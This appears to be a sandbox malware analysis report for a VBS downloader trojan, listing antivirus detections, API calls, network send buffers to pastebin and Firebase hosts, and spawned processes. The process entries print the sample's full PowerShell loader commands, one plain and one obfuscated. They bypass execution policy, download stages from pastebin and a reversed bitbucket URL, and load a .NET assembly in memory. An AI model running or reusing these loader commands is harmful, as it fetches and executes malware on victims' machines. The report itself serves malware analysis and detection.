1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
K7GW NetWorm ( 0053c52c1 )
K7AntiVirus NetWorm ( 0053c52c1 )
Symantec VBS.Downloader.Trojan
Avast Script:SNH-gen [Drp]
Kaspersky HEUR:Trojan.Script.Generic
NANO-Antivirus Trojan.Script.Vbs-heuristic.druvzi
Google Detected
Varist VBS/Agent.CAA
huorong Trojan/VBS.Runner.v
Fortinet VBS/Agent.ABGD!tr.dldr
AVG Script:SNH-gen [Drp]
Time & API Arguments Status Return Repeated

send

buffer: okg÷$‹”‡¬[NöM¾s˜×!lŽ*JÆl¿V„”I/5 ÀÀÀ À 28*ÿ pastebin.com  
socket: 1456
sent: 116
1 116 0

send

buffer: FBAÝÒ6YWÕÆtéZbìˌ‰ƒó ^\6Ù ùÔRý 9Â1ÊÛÝ £}£¯6i7²zí“ût,(A|o霆" iî0”Ȩ«ù0Æ?¹½øÍÚðQé0VʹêõV·ÔÝšÓ `j­ƒÁõT‹à ô˜
socket: 1456
sent: 134
1 134 0

send

buffer: `¹›ÂmµÚqë!í£^??U%Îq·Q…)ŒV³Ï#wô„Mß0ÁÊöSh, *DëÔ󶢑â¯Ó}®Šœø3b†gî¹&’õAʳ>Yæ^*YÕ>ÚêYÑI1x‹
socket: 1456
sent: 101
1 101 0

send

buffer: }g÷$Œ´YÉ øÆsÍ@uÛ&ïŸÜa€Ë>û=‚À/5 ÀÀÀ À 28<ÿ#!firebasestorage.googleapis.com  
socket: 1968
sent: 134
1 134 0

send

buffer: FBAqD¾ ò¥ñg2¤2‡Z×+þiç=zÊNÀøСz«©:<§$PÈ!Úâî¬CRçPìR,®Ð$ú50H&·›£ï½iD_ﶋ¹!®%us4mª³Þ…ç¸@°6 ¶܃eçTª “¡žÒê
socket: 1968
sent: 134
1 134 0

send

buffer: ÐU½&°xª›>Û鈚·„•»« ƒbË ™gÉIÒkY³FÁtøN;)®o’)° u‚;9=¹Ûw÷KI¶T$Éށ… gw‰°]Ÿú­G‚)ùãðm4ÖÀdÔ¿,'Ø(žÔmžûò¢Ú3b9ʹ9]¡qÿvjZÆTP:¥AWû§ó_Gs*ôd)\hŸx¡"ÈjG{à›ú¡!¼€òâg·ÿºrZ“”Ží—Á©VøP" ökp¶´@ìô
socket: 1968
sent: 213
1 213 0
parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\test22\AppData\Local\Temp\dll03.ps1
parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/pzXGkayU' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''txt.5202ffetsos/sdaolnwod/egroeg/4152egroj/gro.tekcubtib//:sptth'' , ''C:\Users\test22\AppData\Local\Temp\sostener2.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwBw★GE★cwB0★GU★YgBp★G4★LgBj★G8★bQ★v★HI★YQB3★C8★c★B6★Fg★RwBr★GE★eQBV★Cc★I★★7★CQ★SQBl★H★★RwBR★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★x★C4★d★B4★HQ★Jw★p★Ds★J★B3★GU★YgBD★Gw★aQBl★G4★d★★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★FI★VgBV★Fg★dg★g★D0★I★★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★Ho★RgBL★GE★QQ★g★Ck★I★★7★CQ★UgBW★FU★W★B2★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BJ★GU★c★BH★FE★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★Cc★VQBU★EY★O★★n★C★★LQBm★G8★cgBj★GU★I★★7★CQ★UwBU★GY★RwBs★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★y★C4★d★B4★HQ★Jw★p★C★★Ow★k★F★★a★By★Gw★Tg★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★F★★a★By★Gw★Tg★u★EU★bgBj★G8★Z★Bp★G4★Zw★g★D0★I★Bb★FM★eQBz★HQ★ZQBt★C4★V★Bl★Hg★d★★u★EU★bgBj★G8★Z★Bp★G4★ZwBd★Do★OgBV★FQ★Rg★4★C★★Ow★k★EQ★S★B6★FU★QQ★g★C★★PQ★g★Cg★I★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★PQ★g★CQ★U★Bo★HI★b★BO★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★EQ★S★B6★FU★QQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BT★FQ★ZgBH★Gw★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BN★E8★R★BS★Gc★I★★9★C★★I★★n★CQ★cgB5★GE★ZQBH★C★★PQ★g★Cg★RwBl★HQ★LQBD★G8★bgB0★GU★bgB0★C★★LQBQ★GE★d★Bo★C★★Jw★n★Cc★I★★r★C★★J★BT★FQ★ZgBH★Gw★I★★r★C★★Jw★n★Cc★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★FU★V★BG★Dg★KQ★7★Cc★I★★7★CQ★TQBP★EQ★UgBn
★C★★Kw★9★C★★JwBb★EI★eQB0★GU★WwBd★F0★I★★k★EY★eQBm★GQ★eg★g★D0★I★Bb★HM★eQBz★HQ★ZQBt★C4★QwBv★G4★dgBl★HI★d★Bd★Do★OgBG★HI★bwBt★EI★YQBz★GU★Ng★0★FM★d★By★Gk★bgBn★Cg★I★★k★HI★eQBh★GU★Rw★u★HI★ZQBw★Gw★YQBj★GU★K★★n★Cc★J★★k★CQ★J★★n★Cc★L★★n★Cc★QQ★n★Cc★KQ★g★Ck★I★★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★FM★eQBz★HQ★ZQBt★C4★QQBw★H★★R★Bv★G0★YQBp★G4★XQ★6★Cc★I★★r★C★★Jw★6★EM★dQBy★HI★ZQBu★HQ★R★Bv★G0★YQBp★G4★LgBM★G8★YQBk★Cg★I★★k★EY★eQBm★GQ★eg★g★Ck★Lg★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★RwBl★HQ★V★B5★H★★ZQ★o★C★★Jw★n★E0★aQBz★GU★cgBp★GM★bwBy★GQ★aQBv★HM★bwBB★G0★ZQBu★C4★QwBs★GE★cwBz★DE★Jw★n★C★★KQ★u★Ec★ZQB0★E0★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★GU★d★Bo★G8★Z★★o★C★★Jw★n★E0★cwBx★EI★SQBi★Fk★Jw★n★C★★KQ★u★Ek★bgB2★G8★awBl★Cg★I★★k★G4★dQBs★Gw★I★★s★C★★WwBv★GI★agBl★GM★d★Bb★F0★XQ★g★Cg★I★★n★Cc★d★B4★HQ★Lg★1★DI★M★★y★GY★ZgBl★HQ★cwBv★HM★LwBz★GQ★YQBv★Gw★bgB3★G8★Z★★v★GU★ZwBy★G8★ZQBn★C8★N★★x★DU★MgBl★Gc★cgBv★Go★LwBn★HI★bw★u★HQ★ZQBr★GM★dQBi★HQ★aQBi★C8★Lw★6★HM★c★B0★HQ★a★★n★Cc★I★★s★C★★Jw★n★CU★SgBr★FE★YQBz★EQ★ZgBn★HI★V★Bn★CU★Jw★n★C★★L★★g★Cc★JwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★LQ★t★C0★LQ★t★C0★LQ★n★Cc★L★★g★Cc★Jw★w★Cc★Jw★s★C★★Jw★n★DE★Jw★n★Cw★I★★n★Cc★UgBv★GQ★YQ★n★Cc★I★★g★Ck★I★★p★C★★Ow★n★C★★Ow★k★FY★QgBX★Fc★eg★g★D0★I★★o★C★★WwBT★Hk★cwB0★GU★bQ★u★Ek★Tw★u★F★★YQB0★Gg★XQ★6★Do★RwBl★HQ★V★Bl★G0★c★BQ★GE★d★Bo★Cg★KQ★g★Cs★I★★n★GQ★b★Bs★D★★Mw★u★H★★cw★x★Cc★I★★p★C★★Ow★k★E0★TwBE★FI★Zw★g★Hw★I★BP★HU★d★★t★EY★aQBs★GU★I★★t★EY★aQBs★GU★U★Bh★HQ★a★★g★CQ★VgBC★Fc★VwB6★C★★I★★t★GY★bwBy★GM★ZQ★g★Ds★c★Bv★Hc★ZQBy★HM★a★Bl★Gw★b★★g★C0★RQB4★GU★YwB1★HQ★aQBv★G4★U★Bv★Gw★aQBj★Hk★I★BC★Hk★c★Bh★HM★cw★g★C0★RgBp★Gw★ZQ★g★CQ★VgBC★Fc★VwB6★C★★Ow★=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\test22\AppData\Local\Temp\sostener2.vbs');powershell $Yolopolhggobek;
parent_process wscript.exe martian_process powershell.exe $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwBw★GE★cwB0★GU★YgBp★G4★LgBj★G8★bQ★v★HI★YQB3★C8★c★B6★Fg★RwBr★GE★eQBV★Cc★I★★7★CQ★SQBl★H★★RwBR★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★x★C4★d★B4★HQ★Jw★p★Ds★J★B3★GU★YgBD★Gw★aQBl★G4★d★★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★FI★VgBV★Fg★dg★g★D0★I★★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★Ho★RgBL★GE★QQ★g★Ck★I★★7★CQ★UgBW★FU★W★B2★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BJ★GU★c★BH★FE★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★Cc★VQBU★EY★O★★n★C★★LQBm★G8★cgBj★GU★I★★7★CQ★UwBU★GY★RwBs★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★y★C4★d★B4★HQ★Jw★p★C★★Ow★k★F★★a★By★Gw★Tg★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★F★★a★By★Gw★Tg★u★EU★bgBj★G8★Z★Bp★G4★Zw★g★D0★I★Bb★FM★eQBz★HQ★ZQBt★C4★V★Bl★Hg★d★★u★EU★bgBj★G8★Z★Bp★G4★ZwBd★Do★OgBV★FQ★Rg★4★C★★Ow★k★EQ★S★B6★FU★QQ★g★C★★PQ★g★Cg★I★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★PQ★g★CQ★U★Bo★HI★b★BO★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★EQ★S★B6★FU★QQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BT★FQ★ZgBH★Gw★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BN★E8★R★BS★Gc★I★★9★C★★I★★n★CQ★cgB5★GE★ZQBH★C★★PQ★g★Cg★RwBl★HQ★LQBD★G8★bgB0★GU★bgB0★C★★LQBQ★GE★d★Bo★C★★Jw★n★Cc★I★★r★C★★J★BT★FQ★ZgBH★Gw★I★★r★C★★Jw★n★Cc★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★FU★V★BG★Dg★KQ★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★EI★eQB0★GU★WwBd★F0★I★★k★EY★e
QBm★GQ★eg★g★D0★I★Bb★HM★eQBz★HQ★ZQBt★C4★QwBv★G4★dgBl★HI★d★Bd★Do★OgBG★HI★bwBt★EI★YQBz★GU★Ng★0★FM★d★By★Gk★bgBn★Cg★I★★k★HI★eQBh★GU★Rw★u★HI★ZQBw★Gw★YQBj★GU★K★★n★Cc★J★★k★CQ★J★★n★Cc★L★★n★Cc★QQ★n★Cc★KQ★g★Ck★I★★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★FM★eQBz★HQ★ZQBt★C4★QQBw★H★★R★Bv★G0★YQBp★G4★XQ★6★Cc★I★★r★C★★Jw★6★EM★dQBy★HI★ZQBu★HQ★R★Bv★G0★YQBp★G4★LgBM★G8★YQBk★Cg★I★★k★EY★eQBm★GQ★eg★g★Ck★Lg★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★RwBl★HQ★V★B5★H★★ZQ★o★C★★Jw★n★E0★aQBz★GU★cgBp★GM★bwBy★GQ★aQBv★HM★bwBB★G0★ZQBu★C4★QwBs★GE★cwBz★DE★Jw★n★C★★KQ★u★Ec★ZQB0★E0★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★GU★d★Bo★G8★Z★★o★C★★Jw★n★E0★cwBx★EI★SQBi★Fk★Jw★n★C★★KQ★u★Ek★bgB2★G8★awBl★Cg★I★★k★G4★dQBs★Gw★I★★s★C★★WwBv★GI★agBl★GM★d★Bb★F0★XQ★g★Cg★I★★n★Cc★d★B4★HQ★Lg★1★DI★M★★y★GY★ZgBl★HQ★cwBv★HM★LwBz★GQ★YQBv★Gw★bgB3★G8★Z★★v★GU★ZwBy★G8★ZQBn★C8★N★★x★DU★MgBl★Gc★cgBv★Go★LwBn★HI★bw★u★HQ★ZQBr★GM★dQBi★HQ★aQBi★C8★Lw★6★HM★c★B0★HQ★a★★n★Cc★I★★s★C★★Jw★n★CU★SgBr★FE★YQBz★EQ★ZgBn★HI★V★Bn★CU★Jw★n★C★★L★★g★Cc★JwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★LQ★t★C0★LQ★t★C0★LQ★n★Cc★L★★g★Cc★Jw★w★Cc★Jw★s★C★★Jw★n★DE★Jw★n★Cw★I★★n★Cc★UgBv★GQ★YQ★n★Cc★I★★g★Ck★I★★p★C★★Ow★n★C★★Ow★k★FY★QgBX★Fc★eg★g★D0★I★★o★C★★WwBT★Hk★cwB0★GU★bQ★u★Ek★Tw★u★F★★YQB0★Gg★XQ★6★Do★RwBl★HQ★V★Bl★G0★c★BQ★GE★d★Bo★Cg★KQ★g★Cs★I★★n★GQ★b★Bs★D★★Mw★u★H★★cw★x★Cc★I★★p★C★★Ow★k★E0★TwBE★FI★Zw★g★Hw★I★BP★HU★d★★t★EY★aQBs★GU★I★★t★EY★aQBs★GU★U★Bh★HQ★a★★g★CQ★VgBC★Fc★VwB6★C★★I★★t★GY★bwBy★GM★ZQ★g★Ds★c★Bv★Hc★ZQBy★HM★a★Bl★Gw★b★★g★C0★RQB4★GU★YwB1★HQ★aQBv★G4★U★Bv★Gw★aQBj★Hk★I★BC★Hk★c★Bh★HM★cw★g★C0★RgBp★Gw★ZQ★g★CQ★VgBC★Fc★VwB6★C★★Ow★=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\test22\AppData\Local\Temp\sostener2.vbs');powershell $Yolopolhggobek;
option -executionpolicy bypass value Attempts to bypass execution policy
option -executionpolicy bypass value Attempts to bypass execution policy
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe